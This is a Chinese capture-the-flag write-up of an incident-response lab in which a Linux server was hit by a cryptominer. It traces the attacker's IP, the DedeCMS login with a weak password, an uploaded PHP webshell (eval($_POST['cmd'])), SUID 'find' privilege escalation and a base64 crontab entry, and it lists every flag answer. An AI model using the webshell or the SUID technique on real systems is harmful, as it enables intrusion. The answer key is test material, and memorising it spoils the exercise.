玄机:第五章 linux实战-挖矿

简介

应急响应工程师在内网服务器发现有台主机 cpu 占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组

复制代码
虚拟机账号:root
密码 :websecyjxy
web端口为:8081

1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}

发现日志里有一个文件大小异常

复制代码
cd /www/admin/websec_80/log/
cut -d- -f 1 nginx_access_2023-12-22.log|uniq -c | sort -rn | head -20

发现了可疑 IP

复制代码
flag{192.168.10.135}

2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}

访问靶场网站

复制代码
52.83.102.186:8081/dede

是 dedecms, 使用弱口令登录

复制代码
账号:admin
密码:12345678

发现有两个账户,根据刚刚获取到的黑客ip,可以发现该时间

复制代码
flag{2023-12-22 19:08:34}

3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}

将文件下载下来,使用 D盾进行扫描检测,发现了一个后门

找到该目录查看文件内容

解密之后是:eval($_POST['cmd']);

复制代码
flag{404.php-cmd}

4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}

查看历史命令记录,发现 find 被赋予了suid权限,黑客可以使用suid提权做后门,

黑客执行以下命令即可从服务权限提升到root权限,即find文件被做了后门,( 黑客利用 find 命令被赋予了SUID权限后所进行的攻击)

find / -exec 任意命令 {} \;

复制代码
flag{/usr/bin/find}

5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag

找挖矿程序就要找计划任务但是crontab指令用不了

审查该文件/etc/crontab,在691行的一段python代码比较可疑,进行base64解码

复制代码
691 nohup python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19Uc nVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))" >/dev/null 2>&1

获得最终的flag

复制代码
flag{websec_True@888!}

flag

复制代码
flag{192.168.10.135}
flag{2023-12-22 19:08:34}
flag{404.php-cmd}
flag{/usr/bin/find}
flag{websec_True@888!}
相关推荐
Felven8 分钟前
飞腾D2000 GPIO中断调试
linux·gpio·中断·d2000
西格电力科技15 分钟前
面向工业用户的绿电直连架构适配技术:高可靠与高弹性的双重设计
大数据·服务器·人工智能·架构·能源
白帽子黑客罗哥22 分钟前
渗透测试技术:从入门到实战的完整指南
网络·安全·web安全·渗透测试·漏洞挖掘·网络安全培训
北邮刘老师31 分钟前
【智能体互联协议解析】ACPs/AIP为什么还在用“落后”的“中心化”架构?
网络·人工智能·架构·大模型·智能体·智能体互联网
CodeCraft Studio31 分钟前
用“录制宏”轻松实现文档自动化:ONLYOFFICE 宏功能实践解析
运维·自动化·onlyoffice·录制宏·创建宏·文档自动化·文档协同
winfield82134 分钟前
MCP 协议详解
开发语言·网络·qt
文刀竹肃35 分钟前
DVWA -XSS(DOM)-通关教程-完结
前端·安全·网络安全·xss
sdszoe492238 分钟前
IP地址规划与VLSM技术
网络·网络协议·tcp/ip·vlsm·ip地址规划
喵了meme1 小时前
Linux学习日记21:读写锁
linux·c语言·学习
m0_569531011 小时前
《K8s 网络入门到进阶:Service 与 Ingress 原理、部署方案及核心区别对比》
网络·容器·kubernetes